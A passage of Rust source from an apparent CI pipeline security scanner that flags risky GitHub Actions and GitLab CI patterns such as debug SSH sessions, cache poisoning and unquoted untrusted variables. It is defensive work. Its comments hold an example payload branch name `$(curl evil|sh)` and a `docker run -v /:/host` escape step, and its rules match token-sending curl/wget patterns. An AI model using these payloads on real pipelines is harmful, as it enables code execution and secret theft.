4423            extras: FindingExtras::default(),
4424        });
4425    }
4426
4427    findings
4428}
4429
4430/// R5 — interactive debug action in an authority workflow.
4431///
4432/// Severity: High. A successful tmate / upterm session opens an external SSH
4433/// endpoint into the runner with the full job environment loaded — every
4434/// secret in scope, the checked-out HEAD, and write access to whatever the
4435/// GITHUB_TOKEN holds. Anyone who can flip `debug_enabled=true` at job start
4436/// (often a maintainer with `workflow_dispatch` permission) can launder the
4437/// job's authority off the runner.
4438pub fn interactive_debug_action_in_authority_workflow(graph: &AuthorityGraph) -> Vec<Finding> {
4439    let mut findings = Vec::new();
4440
4441    // Pre-compute whether the workflow holds non-default authority.
4442    // Two ways to qualify:
4443    //  (a) any step has access to a non-GITHUB_TOKEN Secret or Identity, OR
4444    //  (b) any GITHUB_TOKEN identity has a non-default write permission.
4445    let workflow_has_extra_secrets = graph.authority_sources().any(|n| match n.kind {
4446        NodeKind::Secret => true,
4447        NodeKind::Identity => {
4448            // GITHUB_TOKEN identities are named `GITHUB_TOKEN` or
4449            // `GITHUB_TOKEN (<job>)`. Anything else is extra authority
4450            // (cloud OIDC, ADO service connection, …).
4451            !n.name.starts_with("GITHUB_TOKEN")
4452        }
4453        _ => false,
4454    });
4455
4456    let workflow_has_token_writes = graph
4457        .nodes_of_kind(NodeKind::Identity)
4458        .filter(|n| n.name.starts_with("GITHUB_TOKEN"))
4459        .any(|n| {
4460            n.metadata
4461                .get(META_PERMISSIONS)
4462                .map(|p| {
4463                    let s = p.to_lowercase();
4464                    s.contains("write") || s == "write-all"
4465                })
4466                .unwrap_or(false)
4467        });
4468
4469    if !(workflow_has_extra_secrets || workflow_has_token_writes) {
4470        return findings;
4471    }
4472
4473    for step in graph.nodes_of_kind(NodeKind::Step) {
4474        let Some(action_ref) = step.metadata.get(META_INTERACTIVE_DEBUG) else {
4475            continue;
4476        };
4477
4478        findings.push(Finding {
4479            severity: Severity::High,
4480            category: FindingCategory::InteractiveDebugActionInAuthorityWorkflow,
4481            path: None,
4482            nodes_involved: vec![step.id],
4483            message: format!(
4484                "Step '{}' uses interactive debug action '{action_ref}' inside a workflow that holds non-default secrets or write permissions — a successful debug session forwards the runner's full environment over SSH",
4485                step.name
4486            ),
4487            recommendation: Recommendation::Manual {
4488                action: "Move the debug action into a separate workflow with no secret access and `permissions: read-all`, OR gate the step on an explicit short-lived `workflow_dispatch` input that is removed after use. Never run tmate/upterm in a workflow that holds production credentials.".into(),
4489            },
4490            source: FindingSource::BuiltIn,
4491            extras: FindingExtras::default(),
4492        });
4493    }
4494
4495    findings
4496}
4497
4498/// R9 — PR-specific cache key in a default-branch consumer.
4499///
4500/// Severity: Medium. Speculative rule from the council gap report; the corpus
4501/// did not show a perfect example, so we emit Medium and document the risk.
4502/// A PR build that writes to a cache keyed on `github.head_ref` /
4503/// `github.event.pull_request.head.ref` / `github.actor` populates an entry
4504/// that a later default-branch run can restore — letting an attacker poison
4505/// the build cache from a fork PR.
4506pub fn pr_specific_cache_key_in_default_branch_consumer(graph: &AuthorityGraph) -> Vec<Finding> {
4507    let mut findings = Vec::new();
4508
4509    // Trigger gate: workflow must run on `push` (default branch) AND on a
4510    // PR-context trigger. Without the push side, the cache write never gets
4511    // restored by a privileged consumer; without the PR side, no untrusted
4512    // contributor can populate the cache to begin with.
4513    let triggers = graph.metadata.get(META_TRIGGERS);
4514    let runs_on_push = triggers_contain_any(triggers, &["push"]);
4515    let runs_on_pr = triggers_contain_any(triggers, &["pull_request", "pull_request_target"]);
4516    if !(runs_on_push && runs_on_pr) {
4517        return findings;
4518    }
4519
4520    for step in graph.nodes_of_kind(NodeKind::Step) {
4521        let Some(key) = step.metadata.get(META_CACHE_KEY) else {
4522            continue;
4523        };
4524        if key.is_empty() {
4525            continue;
4526        }
4527        // Detect PR-derived key fragments. Match common spelling variants.
4528        let lower = key.to_lowercase();
4529        let is_pr_keyed = lower.contains("github.head_ref")
4530            || lower.contains("github.event.pull_request.head.ref")
4531            || lower.contains("github.event.pull_request.head.sha")
4532            || lower.contains("github.actor")
4533            || lower.contains("github.triggering_actor");
4534        if !is_pr_keyed {
4535            continue;
4536        }
4537
4538        findings.push(Finding {
4539            severity: Severity::Medium,
4540            category: FindingCategory::PrSpecificCacheKeyInDefaultBranchConsumer,
4541            path: None,
4542            nodes_involved: vec![step.id],
4543            message: format!(
4544                "Step '{}' caches with a PR-derived key ('{key}') in a workflow that also runs on push — a fork PR can poison the cache that the default-branch build later restores",
4545                step.name
4546            ),
4547            recommendation: Recommendation::Manual {
4548                action: "Split the workflow so the `actions/cache` save side runs only on `push: branches: [main]` (or another protected ref) and PR runs use cache restore-only with `lookup-only: true`. Alternatively, key the cache on the file hashes that determine its content, not the branch or actor.".into(),
4549            },
4550            source: FindingSource::BuiltIn,
4551            extras: FindingExtras::default(),
4552        });
4553    }
4554
4555    findings
4556}
4557
4558/// R10 — `gh` / `gh api` runtime escalation with the default GITHUB_TOKEN.
4559///
4560/// Severity: Medium. Static permission checks see only the declared
4561/// `permissions:` block — they miss runtime calls that use the token to
4562/// perform write-class operations the workflow shouldn't be doing in a
4563/// PR-triggered context. Detects `gh ` invocations that mutate state
4564/// (`pr merge`, `release create/upload`, `api -X POST/PATCH/PUT/DELETE`)
4565/// in workflows triggered by `pull_request`, `issue_comment`, or
4566/// `workflow_run`.
4567pub fn gh_cli_with_default_token_escalating(graph: &AuthorityGraph) -> Vec<Finding> {
4568    let mut findings = Vec::new();
4569
4570    // Trigger gate.
4571    let triggers = graph.metadata.get(META_TRIGGERS);
4572    let risky_trigger = triggers_contain_any(
4573        triggers,
4574        &[
4575            "pull_request",
4576            "pull_request_target",
4577            "issue_comment",
4578            "workflow_run",
4579            "pull_request_review",
4580            "pull_request_review_comment",
4581        ],
4582    );
4583    if !risky_trigger {
4584        return findings;
4585    }
4586
4587    for step in graph.nodes_of_kind(NodeKind::Step) {
4588        let Some(body) = step.metadata.get(META_SCRIPT_BODY) else {
4589            continue;
4590        };
4591        if body.is_empty() {
4592            continue;
4593        }
4594        if !body_contains_gh_cli(body) {
4595            continue;
4596        }
4597        let Some(verb) = detect_gh_escalating_verb(body) else {
4598            continue;
4599        };
4600
4601        findings.push(Finding {
4602            severity: Severity::Medium,
4603            category: FindingCategory::GhCliWithDefaultTokenEscalating,
4604            path: None,
4605            nodes_involved: vec![step.id],
4606            message: format!(
4607                "Step '{}' invokes `gh {verb}` against the default GITHUB_TOKEN inside a workflow triggered by an untrusted context — runtime privilege escalation that static permission checks miss",
4608                step.name
4609            ),
4610            recommendation: Recommendation::Manual {
4611                action: "Move write-class `gh`/`gh api` calls into a separate workflow gated on `push` (or an explicit reusable workflow with `secrets: inherit` only for the writer side). On the PR-triggered side, enforce `permissions: read-all` and verify by re-reading the GitHub Actions audit log.".into(),
4612            },
4613            source: FindingSource::BuiltIn,
4614            extras: FindingExtras::default(),
4615        });
4616    }
4617
4618    findings
4619}
4620
4621/// True when `body` invokes the `gh` CLI as a command (not just mentions
4622/// the substring `gh` inside another word). Match `gh ` at start of line, after
4623/// `;`, after `&&`, after `|`, or following indentation/whitespace.
4624fn body_contains_gh_cli(body: &str) -> bool {
4625    for line in body.lines() {
4626        let trimmed = line.trim_start();
4627        if trimmed.starts_with("gh ") || trimmed.starts_with("gh\t") {
4628            return true;
4629        }
4630        // Inline forms after a shell separator.
4631        for sep in ["&& gh ", "|| gh ", "; gh ", "$(gh ", "`gh ", "| gh "] {
4632            if trimmed.contains(sep) {
4633                return true;
4634            }
4635        }
4636    }
4637    false
4638}
4639
4640/// If `body` invokes a write-class `gh` verb, return a short label for it.
4641/// Recognised:
4642///   - `gh pr merge`
4643///   - `gh release create` / `gh release upload` / `gh release delete`
4644///   - `gh api -X POST|PATCH|PUT|DELETE` (any path)
4645///   - `gh api ... <method>` against `/repos/.../{contents,releases,actions/secrets,environments}`
4646fn detect_gh_escalating_verb(body: &str) -> Option<String> {
4647    let lower = body.to_lowercase();
4648    if lower.contains("gh pr merge") {
4649        return Some("pr merge".into());
4650    }
4651    if lower.contains("gh release create") {
4652        return Some("release create".into());
4653    }
4654    if lower.contains("gh release upload") {
4655        return Some("release upload".into());
4656    }
4657    if lower.contains("gh release delete") {
4658        return Some("release delete".into());
4659    }
4660    if lower.contains("gh release edit") {
4661        return Some("release edit".into());
4662    }
4663    // `gh api -X <METHOD>` form. Match the method tokens directly so we don't
4664    // false-positive on `-X-Foo` headers etc.
4665    for method in ["post", "patch", "put", "delete"] {
4666        let needle_dash = format!("gh api -x {method}");
4667        let needle_long = format!("gh api --method {method}");
4668        if lower.contains(&needle_dash) || lower.contains(&needle_long) {
4669            return Some(format!("api -X {}", method.to_uppercase()));
4670        }
4671    }
4672    // Path-based heuristic: even without an explicit -X, certain endpoints are
4673    // mutation endpoints (`gh api repos/.../actions/secrets/FOO -F ...`).
4674    let path_markers = [
4675        "actions/secrets",
4676        "actions/variables",
4677        "/environments",
4678        "/releases",
4679    ];
4680    if lower.contains("gh api ") && path_markers.iter().any(|m| lower.contains(m)) {
4681        // Only escalate when there's also a write-flag. `-f`/`-F`/`--field`/`--input`
4682        // implies POST/PATCH semantics under `gh api`.
4683        let writes = lower.contains(" -f ")
4684            || lower.contains(" -f=")
4685            || lower.contains(" -f\"")
4686            || lower.contains(" --field")
4687            || lower.contains(" --input");
4688        if writes {
4689            return Some("api (mutation endpoint)".into());
4690        }
4691    }
4692    None
4693}
4694
4695// ── GitLab CI rules ─────────────────────────────────────────
4696
4697/// Untrusted GitLab CI predefined variables that an attacker can control by
4698/// pushing a branch / opening an MR / writing a commit message. When any of
4699/// these is interpolated into an unquoted shell expansion the runner
4700/// executes whatever the attacker put inside `` $(...) `` or backticks.
4701const UNTRUSTED_GITLAB_CI_VARS: &[&str] = &[
4702    "CI_COMMIT_BRANCH",
4703    "CI_COMMIT_REF_NAME",
4704    "CI_COMMIT_TAG",
4705    "CI_COMMIT_MESSAGE",
4706    "CI_COMMIT_TITLE",
4707    "CI_COMMIT_DESCRIPTION",
4708    "CI_COMMIT_AUTHOR",
4709    "CI_MERGE_REQUEST_TITLE",
4710    "CI_MERGE_REQUEST_DESCRIPTION",
4711    "CI_MERGE_REQUEST_SOURCE_BRANCH_NAME",
4712];
4713
4714/// Rule: `$CI_JOB_TOKEN` (the GitLab platform-injected job token, broad scope
4715/// by default — registry write, package upload, project read) used as a
4716/// bearer credential against an external HTTP endpoint, or fed to
4717/// `docker login` for `registry.gitlab.com`.
4718///
4719/// Detection: read the Step's `META_SCRIPT_BODY`. Fire when the body
4720/// contains `$CI_JOB_TOKEN` or `${CI_JOB_TOKEN}` AND any of:
4721/// - a `curl` / `wget` / `http` / `https.request` invocation, OR
4722/// - the literal `gitlab-ci-token:` (the token-as-Basic-auth idiom), OR
4723/// - a `docker login` for `registry.gitlab.com`.
4724///
4725/// Severity: High. Category: Credentials.
4726pub fn ci_job_token_to_external_api(graph: &AuthorityGraph) -> Vec<Finding> {
4727    let mut findings = Vec::new();
4728
4729    for step in graph.nodes_of_kind(NodeKind::Step) {
4730        let body = match step.metadata.get(META_SCRIPT_BODY) {
4731            Some(b) if !b.is_empty() => b,
4732            _ => continue,
4733        };
4734
4735        if !body_references_ci_job_token(body) {
4736            continue;
4737        }
4738
4739        let sink = classify_ci_job_token_sink(body);
4740        let Some(sink) = sink else {
4741            continue;
4742        };
4743
4744        findings.push(Finding {
4745            severity: Severity::High,
4746            category: FindingCategory::CiJobTokenToExternalApi,
4747            path: None,
4748            nodes_involved: vec![step.id],
4749            message: format!(
4750                "Step '{}' uses $CI_JOB_TOKEN as a bearer credential ({}) — the token's default scope (registry write, package upload, project read) means a poisoned MR job that emits it can pivot to package or registry pushes",
4751                step.name, sink
4752            ),
4753            recommendation: Recommendation::Manual {
4754                action: "Scope CI_JOB_TOKEN: in Settings → CI/CD → Job token permissions, set the inbound allowlist to the minimum projects required and disable any unused scope (package_registry, container_registry). For uploads, prefer a dedicated short-lived deploy token over CI_JOB_TOKEN. Never POST CI_JOB_TOKEN to webhooks or third-party APIs.".into(),
4755            },
4756            source: FindingSource::BuiltIn,
4757            extras: FindingExtras::default(),
4758        });
4759    }
4760
4761    findings
4762}
4763
4764fn body_references_ci_job_token(body: &str) -> bool {
4765    body.contains("$CI_JOB_TOKEN") || body.contains("${CI_JOB_TOKEN}")
4766}
4767
4768/// Classify how `$CI_JOB_TOKEN` is being used. Returns a short human-readable
4769/// sink description, or None when the token only appears in benign ways
4770/// (e.g. assignment to an env var that's never read).
4771fn classify_ci_job_token_sink(body: &str) -> Option<&'static str> {
4772    let lower = body.to_lowercase();
4773    // gitlab-ci-token:$CI_JOB_TOKEN — the canonical Basic-auth idiom.
4774    if lower.contains("gitlab-ci-token:") && body_references_ci_job_token(body) {
4775        if lower.contains("docker login") && lower.contains("registry.gitlab.com") {
4776            return Some("docker login registry.gitlab.com");
4777        }
4778        if lower.contains("curl") || lower.contains("wget") {
4779            return Some("curl/wget Basic auth (user gitlab-ci-token)");
4780        }
4781        return Some("Basic-auth credential (user gitlab-ci-token)");
4782    }
4783    // JOB-TOKEN: header form (curl/wget against /api/v4/...).
4784    if lower.contains("job-token:") && body_references_ci_job_token(body) {
4785        return Some("JOB-TOKEN header to GitLab API");
4786    }
4787    // curl --header "PRIVATE-TOKEN: $CI_JOB_TOKEN" or similar bearer use.
4788    if (lower.contains("curl") || lower.contains("wget"))
4789        && (lower.contains("authorization:") || lower.contains("private-token:"))
4790        && body_references_ci_job_token(body)
4791    {
4792        return Some("Authorization/PRIVATE-TOKEN header to HTTP endpoint");
4793    }
4794    // Generic: token appears next to a CI_API_V4_URL request — strong signal.
4795    if body.contains("CI_API_V4_URL") && body_references_ci_job_token(body) {
4796        return Some("HTTP request to ${CI_API_V4_URL} with token");
4797    }
4798    None
4799}
4800
4801/// Rule: GitLab `id_tokens:` audience reused across MR-context and
4802/// protected-context jobs in the same file (no audience separation), or set
4803/// to a wildcard / multi-cloud broker URL, or shared with a `secrets:` Vault
4804/// path that the consuming job doesn't need.
4805///
4806/// Detection: collect every OIDC Identity node (Identity with
4807/// `META_OIDC == "true"`) carrying a `META_OIDC_AUDIENCE`. For each audience:
4808/// - Wildcard / `*` audience → fire (b).
4809/// - Same audience reachable from at least one Step marked `META_TRIGGER ==
4810///   merge_request` AND at least one Step that is NOT (i.e. protected-context
4811///   only) → fire (a).
4812///
4813/// Severity: High. Category: Privilege.
4814pub fn id_token_audience_overscoped(graph: &AuthorityGraph) -> Vec<Finding> {
4815    use std::collections::HashMap as Map;
4816
4817    let mut findings = Vec::new();
4818
4819    // Collect (audience → (identity_id, [step_ids that reach it])).
4820    let mut by_aud: Map<&str, Vec<(NodeId, Vec<NodeId>)>> = Map::new();
4821
4822    for ident in graph.nodes_of_kind(NodeKind::Identity) {
4823        let is_oidc = ident.metadata.get(META_OIDC).map(String::as_str) == Some("true");
4824        if !is_oidc {
4825            continue;
4826        }
4827        let Some(aud) = ident.metadata.get(META_OIDC_AUDIENCE) else {
4828            continue;
4829        };
4830        if aud == "unknown" || aud.is_empty() {
4831            continue;
4832        }
4833
4834        // Find steps that hold this identity via HasAccessTo.
4835        let mut consumers: Vec<NodeId> = Vec::new();
4836        for step in graph.nodes_of_kind(NodeKind::Step) {
4837            let holds = graph
4838                .edges_from(step.id)
4839                .any(|e| e.kind == EdgeKind::HasAccessTo && e.to == ident.id);
4840            if holds {
4841                consumers.push(step.id);
4842            }
4843        }
4844        by_aud
4845            .entry(aud.as_str())
4846            .or_default()
4847            .push((ident.id, consumers));
4848    }
4849
4850    for (aud, entries) in &by_aud {
4851        // (b) Wildcard / suspiciously broad audience.
4852        let is_wildcard = *aud == "*"
4853            || aud.contains("/*")
4854            || aud.eq_ignore_ascii_case("any")
4855            || aud.eq_ignore_ascii_case("default");
4856        if is_wildcard {
4857            // Use the first identity node as the anchor.
4858            if let Some((ident_id, consumers)) = entries.first() {
4859                let mut nodes_involved = vec![*ident_id];
4860                nodes_involved.extend(consumers.iter().copied());
4861                findings.push(Finding {
4862                    severity: Severity::High,
4863                    category: FindingCategory::IdTokenAudienceOverscoped,
4864                    path: None,
4865                    nodes_involved,
4866                    message: format!(
4867                        "OIDC id_token audience '{aud}' is wildcard / catch-all — any cloud / Vault role bound to this audience is reachable from every job that mints the token"
4868                    ),
4869                    recommendation: Recommendation::Manual {
4870                        action: "Replace the wildcard `aud:` with a job- or environment-specific audience (e.g. `vault.gitlab.net/prod-deploy`, `aws-deploy-staging`). Bind the downstream role / Vault path to that exact audience so unrelated jobs can't trade the token for the same credential.".into(),
4871                    },
4872                    source: FindingSource::BuiltIn,
4873                    extras: FindingExtras::default(),
4874                });
4875                continue;
4876            }
4877        }
4878
4879        // (a) Same audience reachable from MR-context AND non-MR-context steps.
4880        let all_consumers: Vec<NodeId> = entries
4881            .iter()
4882            .flat_map(|(_, c)| c.iter().copied())
4883            .collect();
4884        let mut has_mr = false;
4885        let mut has_protected = false;
4886        for sid in &all_consumers {
4887            let Some(step) = graph.node(*sid) else {
4888                continue;
4889            };
4890            if step.metadata.get(META_TRIGGER).map(String::as_str) == Some("merge_request") {
4891                has_mr = true;
4892            } else {
4893                has_protected = true;
4894            }
4895        }
4896        if has_mr && has_protected && !entries.is_empty() {
4897            // Anchor at the first identity node carrying this audience.
4898            let (ident_id, _) = &entries[0];
4899            let mut nodes_involved = vec![*ident_id];
4900            nodes_involved.extend(all_consumers.iter().copied());
4901            findings.push(Finding {
4902                severity: Severity::High,
4903                category: FindingCategory::IdTokenAudienceOverscoped,
4904                path: None,
4905                nodes_involved,
4906                message: format!(
4907                    "OIDC id_token audience '{aud}' is shared across merge_request_event jobs and protected-branch jobs — a poisoned MR can mint a token with the same audience as the production deploy and trade it for the same downstream cloud / Vault role"
4908                ),
4909                recommendation: Recommendation::Manual {
4910                    action: "Split audiences by trust context: declare a separate `aud:` for MR-context jobs (e.g. `…/mr-validate`) and a different `aud:` for protected-branch jobs (e.g. `…/prod-deploy`). Bind each downstream role / Vault path to the exact audience of the job that needs it.".into(),
4911                },
4912                source: FindingSource::BuiltIn,
4913                extras: FindingExtras::default(),
4914            });
4915        }
4916    }
4917
4918    findings
4919}
4920
4921/// Rule: untrusted GitLab predefined variable interpolated unquoted into a
4922/// shell context (`script:` / `before_script:` / `after_script:` /
4923/// `environment:url:`). A branch named `` $(curl evil|sh) `` then runs as
4924/// part of the runner.
4925///
4926/// Detection: for each Step, scan `META_SCRIPT_BODY` and `META_ENVIRONMENT_URL`
4927/// for any of `UNTRUSTED_GITLAB_CI_VARS` referenced via `$VAR`, `${VAR}`, or
4928/// `"$VAR"`/`"${VAR}"` (double-quoted — still expanded). A reference inside
4929/// single quotes does NOT fire. Same for `printf %q` / `${VAR@Q}` /
4930/// `${VAR//[^A-Za-z0-9]/}` sanitised forms.
4931///
4932/// Severity: High. Category: Injection.
4933pub fn untrusted_ci_var_in_shell_interpolation(graph: &AuthorityGraph) -> Vec<Finding> {
4934    let mut findings = Vec::new();
4935
4936    for step in graph.nodes_of_kind(NodeKind::Step) {
4937        let mut hits: Vec<&str> = Vec::new();
4938        let mut where_hit: Vec<&str> = Vec::new();
4939
4940        if let Some(body) = step.metadata.get(META_SCRIPT_BODY) {
4941            for var in UNTRUSTED_GITLAB_CI_VARS {
4942                if shell_body_unsafely_expands(body, var) {
4943                    hits.push(*var);
4944                    where_hit.push("script");
4945                }
4946            }
4947        }
4948        if let Some(url) = step.metadata.get(META_ENVIRONMENT_URL) {
4949            for var in UNTRUSTED_GITLAB_CI_VARS {
4950                if url_interpolates_var(url, var) {
4951                    if !hits.contains(var) {
4952                        hits.push(*var);
4953                    }
4954                    if !where_hit.contains(&"environment.url") {
4955                        where_hit.push("environment.url");
4956                    }
4957                }
4958            }
4959        }
4960
4961        if hits.is_empty() {
4962            continue;
4963        }
4964
4965        // Dedup hit list while preserving order.
4966        let mut seen = std::collections::HashSet::new();
4967        let names: Vec<&str> = hits.into_iter().filter(|n| seen.insert(*n)).collect();
4968        let mut wh = where_hit;
4969        wh.sort();
4970        wh.dedup();
4971        let where_str = wh.join(" + ");
4972        let names_str = names.join(", ");
4973
4974        findings.push(Finding {
4975            severity: Severity::High,
4976            category: FindingCategory::UntrustedCiVarInShellInterpolation,
4977            path: None,
4978            nodes_involved: vec![step.id],
4979            message: format!(
4980                "Step '{}' interpolates attacker-controlled GitLab predefined variable(s) [{}] into {} without single-quote isolation — a branch / tag / commit message containing `$(...)` executes inside the runner",
4981                step.name, names_str, where_str
4982            ),
4983            recommendation: Recommendation::Manual {
4984                action: "Pass the untrusted value through the step's `variables:` / `env:` block (one variable per step), then reference it inside the script as `\"$BRANCH\"` (double-quoted is fine when the value is bound to a real shell variable, not YAML-interpolated). For commands that must include the value, sanitise with `printf %q` or `${VAR//[^A-Za-z0-9_-]/}` first. For `environment:url:`, never interpolate `$CI_COMMIT_*` directly — use a slug-only variable (`$CI_COMMIT_REF_SLUG` is sanitised by GitLab).".into(),
4985            },
4986            source: FindingSource::BuiltIn,
4987            extras: FindingExtras::default(),
4988        });
4989    }
4990
4991    findings
4992}
4993
4994/// Returns true if `body` contains an *unsafe* expansion of `$VAR` / `${VAR}`
4995/// — i.e. one that is NOT enclosed in single quotes and NOT obviously
4996/// sanitised. Conservative: errs on the side of flagging because the cost of
4997/// a false negative (RCE) dwarfs the cost of a false positive (one extra
4998/// review comment).
4999fn shell_body_unsafely_expands(body: &str, var: &str) -> bool {
5000    // First check that the variable appears at all.
5001    let dollar = format!("${var}");
5002    let dollar_brace = format!("${{{var}}}");
5003    if !body.contains(&dollar) && !body.contains(&dollar_brace) {
5004        return false;
5005    }
5006
5007    // Walk lines. A line that's entirely single-quoted around the var is
5008    // safe; otherwise we need to be conservative.
5009    for line in body.lines() {
5010        let line = line.trim_start_matches(['-', ' ', '\t']);
5011        if line.is_empty() || line.starts_with('#') {
5012            continue;
5013        }
5014
5015        let candidate_positions: Vec<usize> = line
5016            .match_indices(&dollar)
5017            .map(|(i, _)| i)
5018            .chain(line.match_indices(&dollar_brace).map(|(i, _)| i))
5019            .collect();
5020
5021        for pos in candidate_positions {
5022            // Reject if the var reference is wrapped in single quotes
5023            // (count single-quote occurrences strictly before `pos`; odd
5024            // count means we're inside a single-quoted region).
5025            let prefix = &line[..pos];
5026            let single_count = prefix.matches('\'').count();
5027            if single_count % 2 == 1 {
5028                continue; // inside '...'
5029            }
5030            // Reject if line has obvious sanitiser around the var.
5031            if line.contains("printf %q")
5032                || line.contains("${") && (line.contains("@Q}") || line.contains("//[^"))
5033            {
5034                // Sanitiser keyword present somewhere — be safe and skip.
5035                continue;
5036            }
5037            return true;
5038        }
5039    }
5040    false
5041}
5042
5043fn url_interpolates_var(url: &str, var: &str) -> bool {
5044    let dollar = format!("${var}");
5045    let dollar_brace = format!("${{{var}}}");
5046    url.contains(&dollar) || url.contains(&dollar_brace)
5047}
5048
5049// ── GitLab CI rules ─────────────────────────────────────
5050//
5051// Five rules sourced from the v0.9.0 GitLab corpus gap analysis (council
5052// review of 277 .gitlab-ci.yml files). Detection inputs come from metadata
5053// stamped by `taudit-parse-gitlab` — see `META_GITLAB_*` constants. Each rule
5054// is a no-op on graphs from non-GitLab parsers (the markers will simply be
5055// absent), so wiring all five into `run_all_rules` is safe.
5056
5057/// Mutable branch names used as `ref:` on includes — anyone with push to one
5058/// of these on the source repo can backdoor every consumer's pipeline.
5059const MUTABLE_BRANCH_REFS: &[&str] = &[
5060    "main", "master", "develop", "dev", "trunk", "default", "HEAD",
5061];
5062
5063/// Mid-string fragments inside a `remote:` URL that betray a branch ref
5064/// (vs a tag or sha). GitLab raw URLs use `/-/raw/<ref>/<path>`.
5065fn remote_url_uses_branch(url: &str) -> Option<String> {
5066    // Look for `/-/raw/<ref>/` patterns; ref is the segment after `/-/raw/`.
5067    let idx = url.find("/-/raw/")?;
5068    let after = &url[idx + "/-/raw/".len()..];
5069    let ref_seg = after.split('/').next()?;
5070    if ref_seg.is_empty() {
5071        return None;
5072    }
5073    // Tags / SHAs aren't mutable: a 40-hex string is a sha; a `v\d+...` or
5074    // contains `.` and digits is a tag-ish convention. Branches are everything else.
5075    if ref_seg.len() == 40 && ref_seg.chars().all(|c| c.is_ascii_hexdigit()) {
5076        return None;
5077    }
5078    if ref_seg.starts_with('v')
5079        && ref_seg
5080            .chars()
5081            .nth(1)
5082            .map(|c| c.is_ascii_digit())
5083            .unwrap_or(false)
5084    {
5085        return None;
5086    }
5087    Some(ref_seg.to_string())
5088}
5089
5090/// Rule: `unpinned_include_remote_or_branch_ref` (High, Supply Chain).
5091///
5092/// Top-level GitLab `include:` of a `remote:` URL pinned to a branch, a
5093/// `project:` whose `ref:` is a mutable branch (main/master/develop/...), or
5094/// an include with no `ref:` at all (defaults to HEAD on the source repo).
5095///
5096/// Skips `local:` includes (same repo — same trust boundary), `template:`
5097/// includes (GitLab-maintained), and `component:` includes that have an `@`
5098/// version pin. Reads the structured `META_GITLAB_INCLUDES` blob the parser
5099/// stamps on the graph.
5100pub fn unpinned_include_remote_or_branch_ref(graph: &AuthorityGraph) -> Vec<Finding> {
5101    use taudit_parse_gitlab_include_view::IncludeView;
5102
5103    let blob = match graph.metadata.get(META_GITLAB_INCLUDES) {
5104        Some(s) => s,
5105        None => return Vec::new(),
5106    };
5107    let entries: Vec<IncludeView> = match serde_json::from_str(blob) {
5108        Ok(e) => e,
5109        Err(_) => return Vec::new(),
5110    };
5111
5112    let mut findings = Vec::new();
5113
5114    for entry in entries {
5115        let kind = entry.kind.as_str();
5116        let target = entry.target.as_str();
5117        let git_ref = entry.git_ref.as_str();
5118
5119        match kind {
5120            // local / template / component — skip (or handled separately for
5121            // unversioned components).
5122            "local" | "template" => continue,
5123            "component" => {
5124                if git_ref.is_empty() {
5125                    findings.push(Finding {
5126                        severity: Severity::High,
5127                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5128                        path: None,
5129                        nodes_involved: vec![],
5130                        message: format!(
5131                            "include: component '{target}' has no version pin (no '@<version>') — owner of the component repo can rewrite every consumer's pipeline silently"
5132                        ),
5133                        recommendation: Recommendation::PinAction {
5134                            current: target.to_string(),
5135                            pinned: format!("{target}@<sha-or-tag>"),
5136                        },
5137                        source: FindingSource::BuiltIn,
5138                        extras: FindingExtras::default(),
5139                    });
5140                }
5141            }
5142            "remote" => {
5143                if let Some(branch) = remote_url_uses_branch(target) {
5144                    findings.push(Finding {
5145                        severity: Severity::High,
5146                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5147                        path: None,
5148                        nodes_involved: vec![],
5149                        message: format!(
5150                            "include: remote URL pins branch '{branch}' ({target}) — included YAML executes with consumer's CI_JOB_TOKEN and secrets; whoever controls that branch can backdoor this pipeline"
5151                        ),
5152                        recommendation: Recommendation::PinAction {
5153                            current: target.to_string(),
5154                            pinned: target.replacen(
5155                                &format!("/-/raw/{branch}/"),
5156                                "/-/raw/<full-sha>/",
5157                                1,
5158                            ),
5159                        },
5160                        source: FindingSource::BuiltIn,
5161                        extras: FindingExtras::default(),
5162                    });
5163                }
5164            }
5165            "project" => {
5166                let lower = git_ref.to_ascii_lowercase();
5167                let is_branch = MUTABLE_BRANCH_REFS
5168                    .iter()
5169                    .any(|b| b.eq_ignore_ascii_case(&lower));
5170                let missing = git_ref.is_empty();
5171                let is_sha = git_ref.len() == 40 && git_ref.chars().all(|c| c.is_ascii_hexdigit());
5172                if (missing || is_branch) && !is_sha {
5173                    let why = if missing {
5174                        "no `ref:` (defaults to HEAD on source project)".to_string()
5175                    } else {
5176                        format!("`ref: {git_ref}` is a mutable branch")
5177                    };
5178                    findings.push(Finding {
5179                        severity: Severity::High,
5180                        category: FindingCategory::UnpinnedIncludeRemoteOrBranchRef,
5181                        path: None,
5182                        nodes_involved: vec![],
5183                        message: format!(
5184                            "include: project '{target}' — {why}; included YAML can redefine every job's `script:` and runs with consumer's secrets"
5185                        ),
5186                        recommendation: Recommendation::PinAction {
5187                            current: format!(
5188                                "project: {target}{}",
5189                                if missing {
5190                                    String::new()
5191                                } else {
5192                                    format!(", ref: {git_ref}")
5193                                }
5194                            ),
5195                            pinned: format!("project: {target}, ref: <full-commit-sha>"),
5196                        },
5197                        source: FindingSource::BuiltIn,
5198                        extras: FindingExtras::default(),
5199                    });
5200                }
5201            }
5202            _ => {}
5203        }
5204    }
5205
5206    findings
5207}
5208
5209/// Rule: `dind_service_grants_host_authority` (High, Privilege).
5210///
5211/// A GitLab job that declares a `services: [docker:*-dind]` sidecar AND
5212/// holds at least one secret (other than the implicit, structurally-present
5213/// CI_JOB_TOKEN). The dind sidecar exposes the full Docker socket inside
5214/// the job container, so a malicious build step can `docker run -v /:/host`
5215/// and read the runner host filesystem.
5216pub fn dind_service_grants_host_authority(graph: &AuthorityGraph) -> Vec<Finding> {
5217    let mut findings = Vec::new();
5218
5219    for step in graph.nodes_of_kind(NodeKind::Step) {
5220        let has_dind = step
5221            .metadata
5222            .get(META_GITLAB_DIND_SERVICE)
5223            .map(|v| v == "true")
5224            .unwrap_or(false);
5225        if !has_dind {
5226            continue;
5227        }
5228
5229        // Walk this step's HasAccessTo edges for secrets / non-implicit
5230        // identities. The implicit CI_JOB_TOKEN does not count — every job
5231        // has it by platform design, so flagging on it would emit noise on
5232        // every dind job.
5233        let mut sensitive: Vec<String> = Vec::new();
5234        for edge in graph.edges_from(step.id) {
5235            if edge.kind != EdgeKind::HasAccessTo {
5236                continue;
5237            }
5238            let target = match graph.node(edge.to) {
5239                Some(n) => n,
5240                None => continue,
5241            };
5242            let is_implicit = target
5243                .metadata
5244                .get(META_IMPLICIT)
5245                .map(|v| v == "true")
5246                .unwrap_or(false);
5247            if is_implicit {
5248                continue;
5249            }
